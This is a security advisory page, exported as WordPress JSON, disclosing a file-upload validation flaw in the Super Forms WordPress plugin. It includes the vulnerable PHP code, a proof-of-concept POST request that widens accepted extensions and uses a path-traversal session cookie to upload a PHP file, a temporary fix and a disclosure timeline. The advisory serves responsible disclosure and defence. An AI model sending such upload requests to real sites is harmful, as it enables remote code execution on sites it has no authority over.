{"id":16601,"date":"2021-07-08T11:20:39","date_gmt":"2021-07-08T09:20:39","guid":{"rendered":"https:\/\/herolab-usd.formwandler.rocks\/security-advisories\/usd-2019-0003\/"},"modified":"2022-02-15T09:16:00","modified_gmt":"2022-02-15T08:16:00","slug":"usd-2019-0003","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2019-0003\/","title":{"rendered":"usd-2019-0003"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" global_colors_info=\"{}\"]<\/p>\n

usd-2019-0003 | feeling4design Super Forms \u2013 Drag & Drop Form Builder\/1.6.1 \u2013 4.4.8<\/span><\/h1>\n

<\/span>
Advisory ID<\/strong>: usd-2019-0003<\/span>
CVE Number<\/strong>: N\/A<\/span>
Affected Product<\/strong>: Super Forms<\/span>
Affected Version<\/strong>: 1.6.1 \u2013 4.4.8<\/span>
Vulnerability Type<\/strong>: Missing Server Side File Type Validation<\/span>
Security Risk<\/strong>: Medium<\/span>
Vendor URL<\/strong>: <\/span>https:\/\/github.com\/feeling4design<\/a>
Vendor Status<\/strong>: Fixed (Version 4.5.3)<\/span>
Note<\/strong>: We could still exploit the vulnerability<\/span><\/p>\n

<\/h3>\n

Description<\/h3>\n

Due to the lack of validation on the server side, an attacker can add an arbitrary file extension and upload arbitrary files accordingly. This vulnerability when combined with the vulnerability \u201ePath Traversal in File Upload via PHPSESSID Cookie\u201c described in <\/span>usd-2019-0002<\/a> can lead to Remote Code Execution.<\/span><\/p>\n

<\/span><\/p>\n

Proof of Concept<\/h3>\n

The upload of arbitrary file extension was tested on a customers instance of wordpress + super forms.<\/p>\n

Steps to reproduce:
\u2013 Setup wordpress with super forms and create a form containing an upload form
\u2013 Before submitting this form, add the intended file extension to accept_file_types<\/p>\n

The acceptable file types are part of the http request. By default, it is like \u201ajpg|jpeg|
png|gif|pdf|PDF|JPG|JPEG|PNG|GIF\u2018, but we were able to add PHP or .* in this field.
The related php in file uploads\/php\/index.php:<\/p>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" global_colors_info=\"{}\"]if( (!isset($_REQUEST['max_file_size'])) || (!
\nisset($_REQUEST['accept_file_types'])) ) {
\nexit;
\n}<\/p>\n

error_reporting(E_ALL | E_STRICT);
\nrequire('UploadHandler.php');
\n$max_file_size = $_REQUEST['max_file_size'];
\n$accept_file_types = $_REQUEST['accept_file_types'];
\n$strip = array('php', 'phtml', 'php3', 'php5', 'phps', 'shtml', 'asa', 'cer');<\/p>\n

foreach($strip as $v){
\n$accept_file_types = str_replace($v,'', $accept_file_types);
\n}<\/p>\n

$upload_handler = new UploadHandler(array(
\n'accept_file_types' =&gt; '\/\\.(' . $accept_file_types . ')$\/i',
\n'max_file_size' =&gt; $max_file_size
\n));<\/code><\/pre>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" global_colors_info=\"{}\"]<\/p>\n

To upload the usd.php we used the following HTTP POST request:<\/span>
Please note the added \u201ePHP|.*\u201c<\/span><\/p>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" global_colors_info=\"{}\"]POST \/wp-content\/plugins\/super-forms\/uploads\/php\/ HTTP\/1.1
\nHost: XXXXXXXXXXX
\n[...]
\nContent-Type: multipart\/form-data; boundary=---------------------------100830798400009382880005694
\nCookie: [some cookies] PHPSESSID=..\/
\nConnection: close
\n-----------------------------100830798400009382880005694
\nContent-Disposition: form-data; name=\"accept_file_types\"
\njpg|jpeg|png|gif|pdf|PDF|JPG|JPEG|PNG|GIF|TXT|PHP|.*
\n-----------------------------100830798400009382880005694
\nContent-Disposition: form-data; name=\"max_file_size\"
\n8000000
\n-----------------------------100830798400009382880005694
\nContent-Disposition: form-data; name=\"files[]\"; filename=\"usd.php\"
\nContent-Type: text\/plain
\n&lt;?php echo \"Dies ist ein Pentest!\"; ?&gt;
\n-----------------------------100830798400009382880005694--<\/code><\/pre>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" global_colors_info=\"{}\"]<\/p>\n

\n
\n

Fix<\/h3>\n

Disclaimer<\/i>
The suggested fix is just a temporary workaround and not a final fix that ensures the full security of this wordpress plugin. It is intended to support the developers to close this vulnerability.<\/p>\n

The vulnerabilities we found are not yet fixed by the latest version of this plugin. One option is to turn it off.<\/p>\n

Another option is to apply the following temporary fixes:
In \/uploads\/php\/index.php do not assign $max_file_size and $accept_file_types from user input $_REQUEST[\u201aaccept_file_types\u2018] to limit the allowed file extensions to the intended. For Example, fetch both values from a configuration file instead from user input.<\/p>\n

<\/h3>\n

Timeline<\/h3>\n
    \n
  • 2019-01-25 First Contact request via contact form to: https:\/\/codecanyon.net\/item\/super-forms-drag-drop-form-builder\/13979866\/support<\/li>\n
  • 2019-02-05 Vendor releases version 4.5.3 with a supposed fix. We could still exploit the vulnerability. (related: Changelog on https:\/\/codecanyon.net\/item\/super-forms-drag-drop-form-builder\/13979866)<\/li>\n
  • 2019-07-31 Security advisory released<\/li>\n
  • <\/li>\n<\/ul>\n

    <\/h3>\n

    Credits<\/h3>\n

    This security vulnerabilities were found by Tim Kranz and Matthias G\u00f6hring of usd AG.<\/span><\/p>\n<\/div>\n<\/div>\n

    [\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"

    usd-2019-0003 | feeling4design Super Forms \u2013 Drag & Drop Form Builder\/1.6.1 \u2013 4.4.8 Advisory ID: usd-2019-0003CVE Number: N\/AAffected Product: Super FormsAffected Version: 1.6.1 \u2013 4.4.8Vulnerability Type: Missing Server Side File Type ValidationSecurity Risk: MediumVendor URL: https:\/\/github.com\/feeling4designVendor Status: Fixed (Version 4.5.3)Note: We could still exploit the vulnerability Description Due to the lack of validation on the […]<\/p>\n","protected":false},"author":96,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-16601","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16601","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/96"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=16601"}],"version-history":[{"count":0,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16601\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=16601"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}